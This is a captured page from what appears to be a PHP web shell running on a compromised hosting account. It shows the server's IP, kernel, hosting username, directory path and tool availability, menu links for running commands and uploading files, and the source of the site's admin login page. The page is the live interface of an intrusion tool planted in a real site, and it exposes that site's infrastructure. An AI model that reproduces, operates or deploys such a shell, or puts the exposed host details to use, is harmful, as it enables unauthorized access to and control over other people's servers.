|
Server IP : 86.38.243.193 / Your IP : 216.73.217.143 Web Server : LiteSpeed System : Linux in-mum-web1336.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 User : u493057690 ( 493057690) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : ON Directory (0755) : /home/u493057690/domains/iasfindia.com/public_html/admin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html> <?php require_once "connect.php"?> <html lang = "en"> <head> <title>IASF</title> <meta charset = "utf-8" /> <meta name = "viewport" content = "width=device-width, initial-scale=1.0" /> <link rel = "stylesheet" type = "text/css" href = "../css/bootstrap.css" /> <link rel = "stylesheet" type = "text/css" href = "../css/style.css" /> </head> <body> <nav style = "background-color:rgba(0, 0, 0, 0.1);" class = "navbar navbar-default"> <div class = "container-fluid"> <div class = "navbar-header"> <a class = "navbar-brand" >IASF India</a> </div> </div> </nav> <div class = "container"> <br /> <br /> <div class = "col-md-4"></div> <div class = "col-md-4"> <div class = "panel panel-danger"> <div class = "panel-heading"> <h4>Administrator</h4> </div> <div class = "panel-body"> <form method = "POST" action="login.php"> <div class = "form-group"> <label>Username</label> <input type = "text" name = "username" class = "form-control" required = "required" /> </div> <div class = "form-group"> <label>Password</label> <input type = "password" name = "password" class = "form-control" required = "required" /> </div> <br /> <div class = "form-group"> <button name = "login" class = "form-control btn btn-primary"><i class = "glyphicon glyphicon-log-in"> Login</i></button> </div> </form> </div> </div> </div> <div class = "col-md-4"></div> </div> <br /> <br /> <div style = "text-align:right; margin-right:10px;" class = "navbar navbar-default navbar-fixed-bottom"> <label>© Copyright IASF India 2021 </label> </div> </body> <script src = "../assets/js/jquery.js"></script> <script src = "../assets/js/bootstrap.js"></script> </html>